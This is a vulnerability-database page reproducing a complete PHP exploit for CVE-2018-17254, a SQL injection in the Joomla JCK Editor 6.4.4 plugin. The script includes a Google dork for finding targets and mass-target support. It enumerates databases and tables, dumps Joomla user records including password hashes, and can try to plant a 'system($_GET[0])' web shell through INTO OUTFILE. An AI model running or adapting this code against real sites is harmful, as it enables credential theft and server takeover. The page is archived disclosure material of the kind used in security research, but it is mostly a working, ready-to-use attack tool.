Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla JCK Editor 6.4.4 - (parent) SQL Injection Exploit (2)

🗓️ 08 Mar 2021 00:00:00Reported by zdtType 
zdt
 zdt🔗 0day.today👁 117 Views

Joomla JCK Editor 6.4.4 'parent' SQL Injection Exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2018-17254
17 Sep 201800:00
–circl
CNVD		Joomla! JCK Editor component SQL injection vulnerability
10 Oct 201800:00
–cnvd
Check Point Advisories		UNION Query-based SQL Injection Over HTTP Traffic (CVE-2018-17254; CVE-2020-18144; CVE-2020-29283; CVE-2020-29287; CVE-2020-29288; CVE-2020-35430; CVE-2021-24285)
18 Apr 202100:00
–checkpoint_advisories
CVE		CVE-2018-17254
20 Sep 201814:00
–cve
Cvelist		CVE-2018-17254
20 Sep 201814:00
–cvelist
Dsquare		Joomla Component JCK Editor 6.4.4 SQL Injection
3 Oct 201800:00
–dsquare
Exploit DB		Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
8 Mar 202100:00
–exploitdb
Nuclei		Joomla! JCK Editor SQL Injection
8 Jun 202604:09
–nuclei
NVD		CVE-2018-17254
20 Sep 201814:29
–nvd
OSV		CVE-2018-17254
20 Sep 201814:29
–osv
Rows per page
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

<?php

$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';

function payload($str1, $str2=""){
	return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
}


function get_request($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_columns($columns){
	$parsed_columns = array();
	foreach($columns as $col){
		array_push($parsed_columns, $col);
		array_push($parsed_columns, "0x242324"); //delimiter = $#$
	}
	return $parsed_columns;
}

function inject($url, $payload){
	global $vuln_file;
	$request = get_request($url.$vuln_file.$payload);
	preg_match_all('/url ="(.*)">/', $request, $output);
	return $output;
}
######

function is_vulnerable($url){
	global $vuln_file;
	$output = inject($url, payload("0x6861636b6564"));
	if(isset($output[1][0])){
		if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
			return 1;
		}
	}
	return 0;
}

function get_db_names($url){
	global $vuln_file;
	$db_names = array();
	$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
	foreach($output[1] as $db){
		array_push($db_names, $db);
	}
	return $db_names;
}

function get_table_names($url, $db){
	global $vuln_file;
	$table_names = array();
	$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
	foreach($output as $table){
		array_push($table_names, $table);
	}
	return $table_names;
}

function get_column_names($url, $table){
	global $vuln_file;
	$column_names = array();
	$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
	foreach($output as $column){
		array_push($column_names, $column);
	}
	return $column_names;
}

function dump_columns($url, $columns, $dbname, $table){
	global $vuln_file;
	$column_dump = array();
	$related_arr = array();
	$data = array();
	$output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
	foreach($output[1] as $column){
		$exploded = explode("$#$", $column);
		array_push($data, $exploded);
	}
	foreach($data as $user_info){
		array_pop($user_info);
		array_push($related_arr, array_combine($columns, $user_info));
	}
	return $related_arr;
}

function rce($url){	//probably won't work =(
	global $vuln_file;
	if(!is_vulnerable($url)){
		die(red("[-] Target isn't vulnerable."));
	}
	$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
	$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
	$payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
	$filename = rand(1000, 7359).".php";
	echo cyan("[i]")." Trying to upload a RCE shell...\n";
	foreach($server_root as $path){
		inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
	}
	$get_shell = get_request($url."/".$filename);
	if(strpos($get_shell, $rand_content) !== false){
		echo green("[+] RCE shell successfully uploaded! =)\n");
		die("Usage: ".$url."/".$filename."?0=whoami\n");
	}else{
		echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
		die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
	}
}

function read_file($url, $file){
	global $vuln_file;
}

############

function green($str){
	return "\e[92m".$str."\e[0m";
}
function red($str){
	return "\e[91m".$str."\e[0m";
}
function yellow($str){
	return "\e[93m".$str."\e[0m";
}
function cyan($str){
	return "\e[96m".$str."\e[0m";
}

function banner(){
	echo "
   ___  _____  _   __ _____
  |_  |/  __ \| | / /|  _  \
    | || /  \/| |/ / | | | | _   _  _ __ ___   _ __    ___  _ _
    | || |    |    \ | | | || | | || '_ ` _ \ | '_ \  / _ \| '__|
/\__/ /| \__/\| |\  \| |/ / | |_| || | | | | || |_) ||  __/| |
\____/  \____/\_| \_/|___/   \__,_||_| |_| |_|| .__/  \___||_|
                     ".green("Coder: ").yellow("Nicholas Ferreira")." | |
                                              |_|

";
}
$target = 0;
$rce = 0;
function check(){
	global $argv;
	global $argc;
	global $target;
	global $rce;
	global $target_list;
	global $save_output;
	global $verbose;
	global $less;
	global $specified_db;
	$short_args = "u:t:v::h::l::r::d::";
	$long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
	$options = getopt($short_args, $long_args);

	if(isset($options['h']) || $argc == 1 || isset($options['help'])){
		echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254)

	Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db]

	-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
	-h, --help: Help
	-v, --verbose: Verbose mode (print tables)
	-l, --less: Less outputs (only Administrator usernames and passwords)
	-t, --targets: Load a list of targets
	-r, --rce: Try to upload a RCE shell
	-d, --db: Specifies the DB to dump

	";

		}

		if(isset($options['u'])){
			$target = $options['u'];
		}elseif(isset($options['url'])){
			$target = $options['url'];
		}else{
			$target = "";
		}

		isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0;
		isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0;
		isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0;
		isset($options['f']) ? $target_list = $options['f'] : $target_list = 0;

		if(isset($options['t'])){
			$target_list = $options['t'];
		}elseif(isset($options['targets'])){
			$target_list = $options['targets'];
		}else{
			$target_list = 0;
		}

		if(isset($options['d'])){
			$specified_db = $options['d'];
		}elseif(isset($options['db'])){
			$specified_db = $options['db'];
		}else{
			$specified_db = 0;
		}


		if(strlen($target_list) < 2){
			if($target !== ""){ // check if URL is ok
				if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
					die(red("[i] The target must be a URL.\n"));
				}
				if(strpos($target, "plugins") == false){
					die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
				}
			}else{
				die(cyan("[-] ")."You can get help with -h.\n");
			}
		}

		if($target_list !== 0){ //check if target list is readable
			if(!file_exists($target_list)){
				die(red("[-] ")."Could not read target list file.\n");
			}
		}
}



function exploit($url){ // returns users and passwords
	global $vuln_file;
	global $verbose;
	global $rce;
	global $specified_db;
	global $less;
	echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
	echo cyan("[+] ")."Checking if target is vulnerable...\n";
	if (is_vulnerable($url)){
		$main_db = inject($url, payload("database()"))[1];
		$user_table = "";
		$hostname = inject($url, payload("@@hostname"))[1];
		$mysql_user = inject($url, payload("user()"))[1];
		$mysql_version = inject($url, payload("@@version"))[1];
		$connection_id = inject($url, payload("connection_id()"))[1];

		echo green("[+] Target is vulnerable! =)\n\n");
		echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n";
		echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n";
		echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n";
		echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n";
		echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n";

		if($rce){
			rce($url);
		}


		echo cyan("[+] ")."Getting DB names...\n";
		$dbs = get_db_names($url);
		if(count($dbs) == 0){
			echo("[-] There are no DBs available on this target. =(\n");
		}

		$db_list = array();
		foreach($dbs as $db){
			$num_table = count(get_table_names($url, $db)[1]);
			echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
			array_push($db_list, $db);
		}
		if($main_db == "" && !$specified_db){
			echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
		}
		if($specified_db !== 0){ // if user doesn't specify a custom db
			echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
			$tables = get_table_names($url, $specified_db);
		}else{
			foreach($db_list as $new_db){
				if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
					echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
					$tables = get_table_names($url, $new_db);
				}
			}
		}
		echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
		if(count($tables[1]) == 0){
			echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
		}

		foreach($tables[1] as $table){
			if($verbose) echo $table."\n";
			if(strpos($table, "_users") !== false){
				$user_table = $table;
			}
		}

		if($user_table == ""){
			echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
		}

		echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
		$columns = get_column_names($url, $user_table);

		if(count($columns) == 0){
			echo(red("[-] There are no columns on this table... =(\n"));
		}
		if($verbose){
			echo cyan("[+] ")."Columns found:\n";
			foreach($columns[1] as $coll){
				echo $coll."\n";
			}
		}
		echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";

		$dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table);

		if(is_array($dump) && count($dump) == 0){
			$new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table);
			if(count($new_dump) == 0){
				echo(red("[-] This table is empty! =(\n"));
			}else{
				$dump = $new_dump;
				$usertype = 0;
			}
		}else{
			$usertype = 1;
		}
		echo cyan("\n[+] ")."Retrieved data:\n";
		foreach($dump as $user){
		if($usertype){
			$adm = strpos($user['usertype'], 'Administrator') !== false;
		}else{
			$adm = false;
		}
		if($less){
			if(strpos($user['usertype'], "Administrator") !== false){
				echo "\n=============== ".green($user['username'])." ===============\n";
				foreach($user as $key => $data){
					if(strlen($data) > 0){
							if($key == "username" || $key == "password" || $adm){
								echo($key.": ".red($data)."\n");
							}else{
								echo($key.": ".$data."\n");
							}
					}
				}
			}

		}else{
			echo "\n=============== ".green($user['username'])." ===============\n";
			foreach($user as $key => $data){
				if(strlen($data) > 0){
						if($key == "username" || $key == "password" ||  $adm){
							echo($key.": ".red($data)."\n");
						}else{
							echo($key.": ".$data."\n");
						}
					}
				}
			}

		}

		echo(green("\nExploit completed! =)\n\n\n"));

	}else{
		echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
		echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");
	}
}


banner();
check();

if(strlen($target_list) >1){
	$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline
	foreach($targets as $website){
		if($rce){
			rce($target);
		}else{
			if(strlen($website) > 1){
				exploit($website); //multiple targets
			}
		}
	}
}else{
	exploit($target); //single target
}

?>

#  0day.today [2021-09-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Mar 2021 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 27.5
CVSS 3.19.8
EPSS0.8523
joomlajck editorsql injectionexploitgoogle dorkvendor homepageversioncvephp versionpocdebian 10
117